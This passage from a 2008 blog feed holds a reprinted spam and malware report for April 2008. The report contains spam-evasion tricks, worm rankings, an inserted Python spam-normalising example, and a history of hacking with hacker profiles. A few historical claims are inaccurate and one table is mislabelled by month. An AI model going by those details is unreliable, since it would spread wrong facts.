lead to the same Russian-language site selling DVDs of popular films which have been re-dubbed with humorous voiceovers.&lt;br /&gt;&lt;br /&gt;April once again saw spammers sending pictures that contained text positioned at various angles (see below), which was meant to prevent such images from being detected. &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;In a variation of this technique, spammers also sent several mass mailings containing pictures with handwritten text in an attempt to bypass spam detectors. 
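&lt;br /&gt;&lt;br /&gt;The three obfuscation tricks described above (percent-encoded letters in links, full stops inserted inside words, letters interspersed in telephone numbers) can all be undone before a filter compares messages, so that the variants of one mass mailing collapse onto a single signature. The Python below is an added example, not code from the report or from any product it mentions; the function names, the length heuristic for phone numbers and the sample messages (including the disguised phone number) are this example's own constructions.&lt;br /&gt;&lt;br /&gt;

```python
"""Added example, not code from the report: undo the spam obfuscation
tricks described above (percent-encoded letters in links, full stops
inserted inside words, letters interspersed in telephone numbers) so that
variants of one mass mailing collapse onto a single signature."""
import hashlib
import re
from urllib.parse import unquote, urlsplit

# A link as it appears in a message body; stops at whitespace or a quote.
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
# One or more full stops wedged between two word characters ("П.робл.е.ма").
INTRAWORD_DOT_RE = re.compile(r"(\w)\.+(?=\w)")


def canonical_url(url):
    """Decode %XX escapes and lower-case the host, so that
    http://e%73g%78uvj.info and http://esgxuvj.info/ compare equal.
    The mail client decodes the escapes before the user sees the link;
    a filter that compares raw strings sees two unrelated links."""
    parts = urlsplit(unquote(url.strip()))
    path = parts.path.rstrip("/")
    return parts.scheme.lower() + "://" + parts.netloc.lower() + path


def strip_intraword_dots(text):
    """Remove dots that split words ("то..лько" becomes "только") while
    leaving sentence-ending dots, which are followed by a space, alone."""
    return INTRAWORD_DOT_RE.sub(r"\1", text)


def extract_phone_digits(text, min_digits=7, max_digits=15):
    """Recover telephone numbers whose digits have letters sprinkled between
    them.  Heuristic (this example's own): consecutive whitespace-separated
    tokens that each contain a digit form one candidate; everything but the
    digits is dropped, and candidates of implausible length are discarded."""
    phones = []
    run = []
    for token in text.split() + [""]:  # empty sentinel flushes the last run
        if any(ch.isdigit() for ch in token):
            run.append(token)
            continue
        if run:
            digits = re.sub(r"\D", "", "".join(run))
            if len(digits) in range(min_digits, max_digits + 1):
                phones.append(digits)
            run = []
    return phones


def mailing_signature(message):
    """Stable identifier for a mass mailing.  Built from the canonical links
    and recovered phone numbers, the parts a spammer cannot vary without
    losing the customer; falls back to the de-obfuscated text otherwise."""
    urls = sorted({canonical_url(u) for u in URL_RE.findall(message)})
    body = URL_RE.sub(" ", message)  # keep domain dots out of the de-dotting
    phones = extract_phone_digits(body)
    if urls or phones:
        key = "|".join(urls + phones)
    else:
        key = " ".join(strip_intraword_dots(body).lower().split())
    return hashlib.sha256(key.encode("utf-8")).hexdigest()[:16]


# Constructed samples modelled on the mailings quoted in the report.
RAW_VARIANT = ("Check out this site for information and photos "
               "http://e%73g%78uvj.info")
SEEN_VARIANT = ("Check out this site for information and photos "
                "http://esgxuvj.info/")
DISGUISED_PHONE = "Бесплатная консультация по телефону (4a9b5) 1x2y3-4z5-6w7"
DOTTED_TEXT = "П.робл.е.ма. п.овышения потенци.и вст.ала не то..лько д.ля му.жчин"

if __name__ == "__main__":
    print(canonical_url("http://e%73g%78uvj.info"))      # http://esgxuvj.info
    print(strip_intraword_dots(DOTTED_TEXT))
    print(extract_phone_digits(DISGUISED_PHONE))          # ['4951234567']
    print(mailing_signature(RAW_VARIANT) == mailing_signature(SEEN_VARIANT))
```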
&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;An image with a handwritten message offering an SMS message service that allows the sender’s number to be masked, making the message look as though it is from another number. &lt;br /&gt;&lt;br /&gt;In the first instance it is easy to read the text of the message, though the second picture may pose problems not only for spam filters but also those not used to reading handwriting. &lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;With the approach of the summer holiday season, the amount of spam in mail traffic is declining, and the trend looks set to continue into the summer. However, the fact that spammers are continuing to search for new technologies that bypass anti-spam filters suggests that it will only be a seasonal decline. Moreover, the criminal element in spam is becoming more prevalent, which in turn attracts those who want to profit illegally and further contributes to the criminalization of spam. Unfortunately, the chances of spammers calling a “ceasefire” or “capitulating” in the war on spam are very slim. &lt;br /&gt;&lt;br /&gt;Recent trends&lt;br /&gt;The amount of spam in mail traffic fell compared to March’s (http://www.viruslist.com/en/analysis?pubid=204792004) figure and averaged 86.2%. &lt;br /&gt;0.76% of messages contained malicious files and links to infected web sites. &lt;br /&gt;1.3% of messages contained links to phishing sites. &lt;br /&gt;The amount of spam containing graphical attachments fell considerably compared to March’s figure and accounted for just 13% of spam. &lt;br /&gt;The amount of unsolicited mass mailings containing offers to pay for services via SMS messages increased. &lt;br /&gt;Spammers used special codes to mask messages. &lt;br /&gt;Spam containing links to advertising sites in the .tk domain zone resumed. &lt;br /&gt;&lt;br /&gt;Top 20 Viruses for April 2008&lt;br /&gt;&lt;br /&gt;Position Change in position Name Proactive Detection Flag Percentage &lt;br /&gt;1.   
0  Email-Worm.Win32.NetSky.q  Trojan.generic  40.58  &lt;br /&gt;2.   +1  Email-Worm.Win32.NetSky.d  Trojan.generic  8.18  &lt;br /&gt;3.   +6  Email-Worm.Win32.NetSky.y  Trojan.generic  7.62  &lt;br /&gt;4.   +3  Email-Worm.Win32.Bagle.gt  Trojan.generic  6.64  &lt;br /&gt;5.   +1  Email-Worm.Win32.Scano.gen  Trojan.generic  6.47  &lt;br /&gt;6.   +2  Email-Worm.Win32.NetSky.aa  Trojan.generic  5.81  &lt;br /&gt;7.   New!  Trojan-Downloader.Win32.Agent.ica  downloader  3.08  &lt;br /&gt;8.   -5  Email-Worm.Win32.Nyxem.e  Trojan.generic  3.01  &lt;br /&gt;9.   New!  Net-Worm.Win32.Mytob.x  Worm.P2P.generic  2.94  &lt;br /&gt;10.   New!  Net-Worm.Win32.Mytob.r  Worm.P2P.generic  2.68  &lt;br /&gt;11.   -1  Email-Worm.Win32.Bagle.gen  Trojan.generic  1.73  &lt;br /&gt;12.   +3  Email-Worm.Win32.Scano.bn  Trojan.generic  1.19  &lt;br /&gt;13.   -2  Email-Worm.Win32.Mydoom.l  Worm.P2P.generic  1.07  &lt;br /&gt;14.   New!  Net-Worm.Win32.Mytob.bk  Worm.P2P.generic  0.91  &lt;br /&gt;15.   -13  Email-Worm.Win32.Mydoom.m  Trojan.generic  0.89  &lt;br /&gt;16.   +1  Email-Worm.Win32.NetSky.c  Trojan.generic  0.70  &lt;br /&gt;17.   Return  Net-Worm.Win32.Mytob.c  Trojan.generic  0.69  &lt;br /&gt;18.   0  Email-Worm.Win32.NetSky.t  Trojan.generic  0.62  &lt;br /&gt;19.   New!  Email-Worm.Win32.Bagle.dx  Trojan.generic  0.47  &lt;br /&gt;20.   New!  Email-Worm.Win32.NetSky.ac  Trojan.generic  0.47  &lt;br /&gt;Other Malicious Programs  4.06  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In April 2008, malicious code in mail traffic underwent significant changes in comparison to the previous month. Net-Worm.Win32.Mytob.t and Email-Worm.Win32.Mydoom.m, which had been pushing their way to the top by jumping ten places last month, suddenly appeared to run out of steam: one slid back down the rankings, while the other disappeared off the bottom of the table altogether. 
At the same time, new malicious programs appeared in the Top Twenty, something which didn't happen in March. &lt;br /&gt;&lt;br /&gt;The most recent mass mailing of the Diehard Trojan took place in February, and it seems that the authors are taking a break from spreading their creation widely. Our suppositions in March that this Trojan might end up lying low, rather than actively attacking, seem to be borne out by the absence of the program from this month's Top Twenty. &lt;br /&gt;&lt;br /&gt;Once again, it's worms that have been around for some time which are out in full strength, with a range of modifications of Email-Worm.Win32.NetSky taking up seven out of twenty places in the rankings. This could be seen as a certain measure of success for the virus writers, especially if you consider that these modifications made up almost 64% of all infected mail traffic in April. &lt;br /&gt;&lt;br /&gt;Trojan-Downloader.Win32.Small.hsl, which appeared in February and which rose to fifth place, has disappeared, being replaced by Trojan-Downloader.Win32.Agent.ica. However, the displacement of one Trojan-Downloader program by another is mere coincidence: the two programs have nothing in common, being constructed in completely different ways and created using different versions of Microsoft Visual Studio. &lt;br /&gt;&lt;br /&gt;Neither Zhelatin (a.k.a. the Storm Worm) nor Warezov, which vanished from the rankings in February, have returned. It seems their authors may have decided against spreading their creations by using email attachments. &lt;br /&gt;&lt;br /&gt;Overall, the picture created by the April 2008 statistics once again confirms the fact that new malicious programs are not being sent as attachments to emails. This tried and tested method, which is very resource intensive (at least when carrying out the initial mass mailing), is mainly used by the veteran malicious programs – those with email worm functionality. 
It's only rarely that we see Trojan-Downloader programs that put in a brief appearance in the Top Twenty; this is probably the result of mass mailings being conducted by malicious users who are new to the scene. &lt;br /&gt;&lt;br /&gt;Overall, malicious programs made up 0.95% of all mail traffic scanned by Kaspersky Lab systems in April 2008. Other malicious programs made up a certain percentage (4.06%) of all malicious code found in mail traffic, indicating that a number of other worms and Trojans are currently in active circulation.&lt;br /&gt;&lt;br /&gt;The Top Twenty countries which acted as sources of infected emails in March are shown below:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Position Change Country Percentage &lt;br /&gt;1   0  the US  18.50  &lt;br /&gt;2   +2  Korea, Republic of  9.99  &lt;br /&gt;3   +4  Spain  8.12  &lt;br /&gt;4   -2  China  5.30  &lt;br /&gt;5   +7  Poland  5.11  &lt;br /&gt;6   +3  France  4.99  &lt;br /&gt;7   +1  Brazil  4.28  &lt;br /&gt;8   -2  Germany  3.98  &lt;br /&gt;9   -4  UK  3.47  &lt;br /&gt;10   0  Italy  3.05  &lt;br /&gt;11   New!  Israel  2.31  &lt;br /&gt;12   -9  India  2.25  &lt;br /&gt;13   -2  Japan  2.07  &lt;br /&gt;14   New!  Argentina  1.63  &lt;br /&gt;15   0  Turkey  1.36  &lt;br /&gt;16   -2  Australia  1.16  &lt;br /&gt;17   +2  Netherlands  1.14  &lt;br /&gt;18   New!  
Romania  1.11  &lt;br /&gt;19   -2  Canada  1.06  &lt;br /&gt;20   -7  Russia  0.97  &lt;br /&gt;Other countries  18.15  &lt;br /&gt;&lt;br /&gt;Summary:&lt;br /&gt;Went up: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Scano.bn, Email-Worm.Win32.NetSky.c &lt;br /&gt;Went down: Email-Worm.Win32.Nyxem.e, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.Mydoom.m &lt;br /&gt;Re-entry: Net-Worm.Win32.Mytob.c &lt;br /&gt;No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.NetSky.t</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/4249456899348286016/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=4249456899348286016' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/4249456899348286016'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/4249456899348286016'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/computer-viruses-and-there-analysis.html' title='Computer Viruses and There Analysis'/><author><name>PROF. 
SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-1559741558703352523</id><published>2008-06-07T08:51:00.000-07:00</published><updated>2008-06-07T09:14:42.258-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='virusopedia'/><category scheme='http://www.blogger.com/atom/ns#' term='mentality'/><category scheme='http://www.blogger.com/atom/ns#' term='jith'/><category scheme='http://www.blogger.com/atom/ns#' term='global'/><category scheme='http://www.blogger.com/atom/ns#' term='latest'/><category scheme='http://www.blogger.com/atom/ns#' term='sri lanka'/><category scheme='http://www.blogger.com/atom/ns#' term='internet'/><category scheme='http://www.blogger.com/atom/ns#' term='hacker'/><category scheme='http://www.blogger.com/atom/ns#' term='computer'/><title type='text'>The history of Computer Viruses</title><content type='html'>History of Hacking-related Events&lt;br /&gt;December 1947 - William Shockley invents the transistor and demonstrates its use for the first time. The first transistor consisted of a messy collection of wires, insulators and germanium. According to a recent poll on CNN's website, the transistor is believed to be the most important discovery in the past 100 years. &lt;br /&gt;1964 - Thomas Kurtz and John Kemeny create BASIC, one of the most popular programming languages even nowadays. &lt;br /&gt;1965 - It's estimated that approximately 20,000 computer systems are in use in the United States. Most of these are manufactured by International Business Machines (IBM). &lt;br /&gt;1968 - Intel is founded. &lt;br /&gt;1969 - AMD is founded. 
&lt;br /&gt;1969 - The Advanced Research Projects Agency (ARPA) creates the ARPANET, the forerunner of the Internet. The first four nodes (networks) of ARPANET consisted of the University of California Los Angeles, University of California Santa Barbara, University of Utah and the Stanford Research Institute. &lt;br /&gt;1969 - Intel announces 1K (1024 bytes) RAM modules. &lt;br /&gt;1969 - Ken Thompson and Dennis Ritchie begin work on UNICS. Thompson writes the first version of UNICS in one month on a machine with 4KB of 18-bit words. UNICS is later renamed 'UNIX'. &lt;br /&gt;1969 - MIT becomes home to the first computer hackers, who begin altering software and hardware to make it work better and/or faster. &lt;br /&gt;1969 - Linus Torvalds is born in Helsinki. &lt;br /&gt;1970 - DEC introduces the PDP-11, one of the most popular computer designs ever. Some are still in use today. &lt;br /&gt;1971 - John Draper, aka 'Cap'n Crunch', hacks phone systems using a toy whistle from a cereal box. &lt;br /&gt;1971 - The first email program is released for the Arpanet. The author is Ray Tomlinson, who decides to use the '@' character to separate the user name from the domain address. &lt;br /&gt;1972 - Ritchie and Kernighan rewrite UNIX in C, a programming language designed with portability in mind. &lt;br /&gt;1972 - NCSA develops the 'telnet' tool. &lt;br /&gt;1973 - Gordon Moore, Intel's chairman, postulates the famous 'Moore's Law', which states that the number of transistors in CPUs will double every 18 months, a law which will stay true for more than 20 years. &lt;br /&gt;1973 - FTP is introduced. &lt;br /&gt;1974 - Stephen Bourne develops the first major UNIX shell, the 'Bourne' shell. &lt;br /&gt;1975 - Bill Gates and Paul Allen found Microsoft. &lt;br /&gt;1976 - A 21-year-old Bill Gates writes 'An Open Letter to Hobbyists', a document in which he condemns open source and software piracy. &lt;br /&gt;April 1st, 1976 - Apple Computers is founded. 
&lt;br /&gt;1977 - Bill Joy authors BSD, another UNIX-like operating system. &lt;br /&gt;1979 - Microsoft licenses the UNIX source code from AT&amp;T and creates its own implementation, 'Xenix'. &lt;br /&gt;1981 - The Domain Name System (DNS) is created. &lt;br /&gt;1981 - Microsoft acquires the intellectual property rights for DOS and renames it MS-DOS. &lt;br /&gt;1982 - Sun Microsystems is founded. Sun will become famous for its SPARC microprocessors, Solaris, the Network File System (NFS) and Java. &lt;br /&gt;1982 - Richard Stallman begins to develop a free version of UNIX which he calls 'GNU', a recursive definition meaning 'GNU's Not UNIX'. &lt;br /&gt;1982 - William Gibson invents the term 'cyberspace'. &lt;br /&gt;1982 - SMTP, the 'Simple Mail Transfer Protocol', is published. SMTP is currently the most widespread method for exchanging messages on the Internet. &lt;br /&gt;1982 - Scott Fahlman invents the first emoticon, ':)'. &lt;br /&gt;1983 - The Internet is founded by splitting the Arpanet into separate military and civilian networks. &lt;br /&gt;1983 - FidoNet is developed by Tom Jennings. FidoNet will become the most widespread information exchange network in the world for the next 10 years, until the Internet takes over. &lt;br /&gt;1983 - Kevin Poulsen, aka 'Dark Dante', is arrested for breaking into the Arpanet. &lt;br /&gt;1984 - Cisco Systems is founded. &lt;br /&gt;1984 - Fred Cohen develops the first PC viruses and comes up with the now-standard term 'computer virus'. &lt;br /&gt;1984 - Andrew Tanenbaum creates Minix, a free UNIX clone based on a modular microkernel architecture. &lt;br /&gt;1984 - Bill Landreth, aka 'The Cracker', is convicted of hacking computer systems and accessing NASA and Department of Defense computer data. &lt;br /&gt;1984 - Apple introduces Macintosh System 1.0. &lt;br /&gt;1985 - Richard Stallman founds the Free Software Foundation. 
&lt;br /&gt;March 15, 1985 - 'Symbolics.com' is registered as the first Internet domain name. &lt;br /&gt;November 1985 - Microsoft releases 'Windows 1.0', which sells for $100. &lt;br /&gt;1986 - The Computer Fraud and Abuse Act is adopted in the US. &lt;br /&gt;1986 - 'Legion of Doom' member Loyd Blankenship, aka 'The Mentor', is arrested and publishes the now famous 'Hacker's Manifesto'. &lt;br /&gt;1988 - The CD-ROM is invented. &lt;br /&gt;1988 - IRC is established. &lt;br /&gt;November 1988 - Robert Morris launches an Internet worm which infects several thousand systems and clogs computers around the country due to a programming error. This worm is now known as the Morris worm. &lt;br /&gt;1989 - The WWW is developed at CERN labs, in Switzerland. &lt;br /&gt;1990 - The Arpanet is dismantled. &lt;br /&gt;1990 - Kevin Poulsen hacks a phone system in LA, making himself the winner of a Porsche 944 in a radio phone-in. &lt;br /&gt;1991 - PGP (Pretty Good Privacy), a powerful, free encryption tool, is released by Philip Zimmermann. The software quickly becomes the most popular encryption package in the world. &lt;br /&gt;1991 - Rumours appear regarding the computer virus 'Michelangelo', coded to launch its destructive payload on March 6th. &lt;br /&gt;September 17, 1991 - Linus Torvalds releases the first version of Linux. &lt;br /&gt;1992 - The 'Masters of Deception' phone phreaking group is arrested due to evidence obtained via wiretaps. &lt;br /&gt;1993 - The Mosaic web browser is released. &lt;br /&gt;1993 - Microsoft releases Windows NT. &lt;br /&gt;1993 - The first version of FreeBSD is released. &lt;br /&gt;March 23, 1994 - 16-year-old Richard Pryce, aka 'Datastream Cowboy', is arrested and charged with unauthorized computer access. &lt;br /&gt;1994 - Vladimir Levin, a Russian mathematician, hacks into Citibank and steals $10 million. &lt;br /&gt;1995 - Dan Farmer and Wietse Venema release SATAN, an automated vulnerability scanner, which becomes a popular hacking tool. 
&lt;br /&gt;1995 - Chris Lamprecht, aka 'Minor Threat', is the first person ever to be banned from the Internet. &lt;br /&gt;1995 - Sun launches Java, a computer programming language designed to be portable across different platforms in compiled form. &lt;br /&gt;August 1995 - Microsoft Internet Explorer (IE) is released. IE will become the most exploited web browser in history and a favourite target for virus writers and hackers. &lt;br /&gt;August 1995 - Windows 95 is launched. &lt;br /&gt;1996 - IBM releases OS/2 Warp version 4, a powerful multi-tasking operating system with a new user interface, as a counter to Microsoft's recently released Windows 95. Despite being more reliable and stable, OS/2 will slowly lose ground and be discontinued a few years later. &lt;br /&gt;1996 - ICQ, the first IM, is released. &lt;br /&gt;1996 - Tim Lloyd plants a software time bomb at Omega Engineering, a company in New Jersey. The results of the attack are devastating: losses of USD $12 million, and more than 80 employees lose their jobs. Lloyd is sentenced to 41 months in jail. &lt;br /&gt;1997 - DVD format specifications are published. &lt;br /&gt;1998 - Two Chinese hackers, Hao Jinglong and Hao Jingwen (twin brothers), are sentenced to death by a court in China for breaking into a bank's computer network and stealing 720,000 yuan ($87,000). &lt;br /&gt;March 18, 1998 - Ehud Tenenbaum, a prolific hacker aka 'The Analyzer', is arrested in Israel for hacking into many high-profile computer networks in the US. &lt;br /&gt;1998 - The CIH virus is released. CIH was the first virus to include a payload which wipes the FLASH BIOS memory, rendering computer systems unbootable and invalidating the myth that 'viruses cannot damage hardware'. &lt;br /&gt;March 26, 1999 - The Melissa virus is released. &lt;br /&gt;2000 - A Canadian teenage hacker known as 'Mafiaboy' conducts a DoS attack and renders Yahoo, eBay, Amazon.com, CNN and a few other web sites inaccessible. 
He is later sentenced to eight months in a youth detention center. &lt;br /&gt;2000 - Microsoft Corporation admits its computer network was breached and that the code for several upcoming versions of Windows was stolen. &lt;br /&gt;2000 - The FBI arrests two Russian hackers, Alexei V. Ivanov and Vasiliy Gorshkov. The arrests took place after a long and complex operation which involved bringing the hackers to the US for a 'hacking skills demonstration'. &lt;br /&gt;July 2001 - The CodeRed worm is released. It spreads quickly around the world, infecting a hundred thousand computers in a matter of hours. &lt;br /&gt;2001 - Microsoft releases Windows XP. &lt;br /&gt;July 18th, 2002 - Bill Gates announces the 'Trustworthy Computing' initiative, a new direction in Microsoft's software development strategy aimed at increasing security. &lt;br /&gt;October 2002 - A massive attack against 13 root domain servers of the Internet is launched by unidentified hackers. The aim: to stop the domain name resolution service around the net. &lt;br /&gt;2003 - Microsoft releases Windows Server 2003. &lt;br /&gt;April 29th, 2003 - New Scotland Yard arrests Lynn Htun at London's InfoSecurity Europe 2003 computer fair. Lynn Htun is believed to have gained unauthorized access to many major computer systems, such as those of Symantec and SecurityFocus. &lt;br /&gt;November 6th, 2003 - Microsoft announces a USD 5 million reward fund. The money will be given to those who help track down hackers targeting the software giant's applications. &lt;br /&gt;May 7th, 2004 - Sven Jaschan, the author of the Netsky and Sasser Internet worms, is arrested in northern Germany. &lt;br /&gt;September 2004 - IBM presents a supercomputer which is the fastest machine in the world. Its sustained speed is 36 trillion operations per second. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Major Hacker Personalities&lt;br /&gt;This section contains brief information on some of the most famous hackers, both black and white hats. 
The individuals below are well known for a variety of reasons: their actions, whether good or bad, their contributions to software and technology development, or their innovative approach, skills and ability to think outside the box.&lt;br /&gt;&lt;br /&gt;Richard Stallman is known as the father of free software. When Stallman started working at MIT's Artificial Intelligence Lab in 1971 he was confronted with 'non-disclosure agreements' and closed program sources while he was hacking and improving system drivers the 'traditional way'. After an interesting battle to obtain the source code of a faulty printer utility, Stallman gave up his job and became the loudest advocate for free computer software, creating GNU and the Free Software Foundation in the process.&lt;br /&gt;&lt;br /&gt;Dennis Ritchie and Ken Thompson are famous for two major software developments of the 20th century: the UNIX operating system and the C programming language. These two began their careers at Bell Labs in the 1960s, revolutionising the computer world forever with their ideas. While Ken Thompson has retired from the computer world, Dennis Ritchie is still employed at Lucent Technology, working on a new operating system derived from Unix, called 'Plan9'.&lt;br /&gt;&lt;br /&gt;John Draper, aka 'Cap'n Crunch', is famous for his ability to hack phone systems using nothing but a whistle from the 'Cap'n Crunch' cereal boxes (hence the nickname). Besides being the father of 'phone phreaking', John Draper is also famous for writing what was perhaps the first IBM PC word processor. He now heads his own security venture, developing antispam solutions, thwarting hacker attacks and securing PCs.&lt;br /&gt;&lt;br /&gt;Robert Morris is famous for creating the first Internet worm in 1988. It infected thousands of systems, and practically brought the Internet to a halt for nearly a day. 
The 'Morris Worm' was perhaps the first fully automated hacking tool, exploiting a couple of unpatched vulnerabilities on VAX and Sun computers.&lt;br /&gt;&lt;br /&gt;Kevin Mitnick, possibly the best known case of a 'black hat', was caught by the computer expert Tsutomu Shimomura back in 1995.&lt;br /&gt;&lt;br /&gt;Kevin Poulsen remains famous for his 1990 hack of the phone system in Los Angeles. This enabled him to become the 102nd caller in a radio phone-in and win a Porsche 944. Kevin Poulsen was eventually caught and imprisoned for three years. He now works as a columnist for the online security magazine 'SecurityFocus'.&lt;br /&gt;&lt;br /&gt;Vladimir Levin, a Russian computer expert, hacked into Citibank and extracted USD $10 million. He was arrested by Interpol in the UK back in 1995 and sentenced to three years in prison, as well as being required to pay USD $240,015 in restitution.&lt;br /&gt;&lt;br /&gt;Tsutomu Shimomura is a good example of a 'white hat'. He was working for the San Diego Supercomputing Center when Kevin Mitnick broke into his network and stole information on cellular technology and other classified data. Tsutomu started the pursuit of Mitnick which eventually led to his arrest.&lt;br /&gt;&lt;br /&gt;Linus Torvalds is known as the father of Linux, the most popular Unix-based operating system in use nowadays. Linus started his work on a new operating system in 1991, adopting several controversial technologies for his project, namely the concept of Free Software and GNU's Public License system. He is also known for his early disputes with Andrew Tanenbaum, the author of Minix, which was the inspirational source for Linus' OS project.&lt;br /&gt;&lt;br /&gt;Hackers and the Law&lt;br /&gt;Given that computer hacking is at least three decades old, there has been plenty of time for governments to develop and approve cybercrime laws. 
At the moment, almost all developed countries have some form of anti-hacking law or legislation on data theft or corruption which can be used to prosecute cyber criminals. There are efforts to make these laws even more stringent, which sometimes raise protests from groups which support the right to freedom of information.&lt;br /&gt;&lt;br /&gt;Over the past few years, there have been lots of convictions for hacking and unauthorized data access. Here are a few of them:&lt;br /&gt;&lt;br /&gt;Kevin Mitnick is probably one of the most famous hacker takedown cases. Mitnick was arrested by the FBI in Raleigh, North Carolina, on February 15th, 1995, after the computer expert Tsutomu Shimomura managed to track him to his hideout. After pleading guilty to most of the charges brought against him, Mitnick was sentenced to 46 months in prison and three years' probation. He was additionally sentenced to another twenty-two months for probation violation and additional charges. He was eventually released from prison on January 21, 2000. &lt;br /&gt;Pierre-Guy Lavoie, a 22-year-old Canadian hacker, was sentenced to 12 months of community service and placed on probation for 12 months for fraudulently using computer passwords to perpetrate computer crimes. He was sentenced under Canadian law. &lt;br /&gt;Thomas Michael Whitehead, 38, of Boca Raton, Florida, was the first person to be found guilty under the Digital Millennium Copyright Act (DMCA). He was prosecuted as part of the Attorney General's Computer Hacking and Intellectual Property program and charged with selling hardware which could be used to illegally receive DirecTV satellite broadcasts. &lt;br /&gt;Serge Humpich, a 36-year-old engineer, was given a suspended prison sentence of 10 months by a ruling issued by the 13th correctional chamber. He also had to pay 12,000 francs (approx. €1,200) in fines, and symbolic damages of one franc to the 'Groupement des Cartes Bancaires'. 
&lt;br /&gt;On October 10, 2001, Vasiliy Gorshkov, age 26, of Chelyabinsk, Russia, was found guilty of 20 counts of conspiracy, computer crime, and fraud committed against the Speakeasy Network of Seattle, Washington; Nara Bank of Los Angeles, California; Central National Bank of Waco, Texas; and the online payment company PayPal of Palo Alto, California. &lt;br /&gt;On July 1, 2003, Oleg Zezev, aka "Alex," a Kazakhstan citizen, was sentenced in a Manhattan federal court to over four years (51 months) in prison following his conviction on extortion and computer hacking charges. &lt;br /&gt;Mateias Calin, a Romanian hacker, along with five American citizens, was indicted by a federal grand jury on charges that they conspired to steal more than $10 million in computer equipment from Ingram Micro in Santa Ana, California, the largest technology distributor in the world. Mateias and his network are yet to be convicted of these crimes and face up to 90 years in prison. &lt;br /&gt;The list above is simply a brief digest which illustrates how cybercrime legislation has been used across the world against hackers or to convict cybercriminals in general. There are also some cases where people have been wrongly convicted of cybercrime. There are also numerous cases where hackers are still at liberty despite their names and identities being known. However, the number of such cases is being reduced day by day.&lt;br /&gt;&lt;br /&gt;Cybercrime is here to stay. It is a reality of the 21st century, and the wide availability of the Internet and the insecure systems which come with it have increased the reach of cybercrime. With sufficiently sophisticated legislation, and more international cybercrime treaties being adopted, the world is hopefully heading in the right direction, with the long-term aim being a safer, more law-abiding cyberspace.&lt;br /&gt;&lt;br /&gt;An Analysis of Hacker Mentality&lt;br /&gt;Why people hack is a subject which is often discussed. 
Some say the explanation is the same as the one given by people who climb mountains: 'because they [computers] are out there'. Others claim that by highlighting vulnerabilities, hacking helps increase computer security. And finally, there is the explanation most often put forward: criminal intent.&lt;br /&gt;&lt;br /&gt;Whatever the reason, as long as computers exist there will be hackers - white hats, black hats and grey hats. And because there is no way of predicting which kind of attack ('curiosity' versus 'malicious') will hit your computer first, it is always best to be prepared for the worst.&lt;br /&gt;&lt;br /&gt;The truth is that within hours of a machine being connected to the Internet, somebody will scan it with an automated vulnerability probing tool, looking for ways to get in. It may be somebody who is just curious to see what is on the machine, or a white hat from the other side of the world checking to see if the computer is secure. Of course, in real life you wouldn't want passing strangers stopping to check if your house or car were locked, and, if not, to go inside, look around, go through your possessions and leave a note saying 'Hi, I was here, your door was open, but don't mind me and BTW, fix your lock'. If you wouldn't want someone to do this to your house, you wouldn't want someone doing it to your computer. And there is no excuse for doing it to someone else's computer either.&lt;br /&gt;&lt;br /&gt;Premeditated, criminal hacking is obviously even worse. In the real world, somebody walks by, breaks your lock, gets inside, disables your alarm system, steals something or plants listening devices in your phone or surveillance equipment in your living room. If this happens you call the police, they look around, write a report, and you wait for the thieves to be caught. 
Unfortunately, this is a rare luxury in the computer world; the culprit may be far, far away, downloading your confidential files while sitting in his personal villa or sunbathing by his huge pool, nicely built with stolen money. Or, in a business environment, many large corporations prefer not to report hacking incidents at all, in order to protect their company image. This means that the criminals remain unpunished.&lt;br /&gt;&lt;br /&gt;Another hacker motivation may be hooliganism, or digital graffiti, which can be summed up as hacking into systems to cause damage. Web site defacement is a very popular form of digital graffiti, and there are some hacking groups which focus on this task alone. Just as in the physical, non-cyber world, catching the hooligans is a tedious task which usually doesn't repay the effort or resources expended.&lt;br /&gt;&lt;br /&gt;Whatever the reasoning, be it 'to help others', 'security heads-up!', 'hooliganism' or 'criminal intent', hacking is a phenomenon which is deeply rooted in the world of computing and will probably never die. 
There will always be people immature enough to abuse public resources, self-proclaimed 'Robin Hoods' and criminals hiding in the dark alleys of cyberspace.</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/1559741558703352523/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=1559741558703352523' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/1559741558703352523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/1559741558703352523'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/history-of-computer-viruses.html' title='The history of Computer Viruses'/><author><name>PROF. SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total 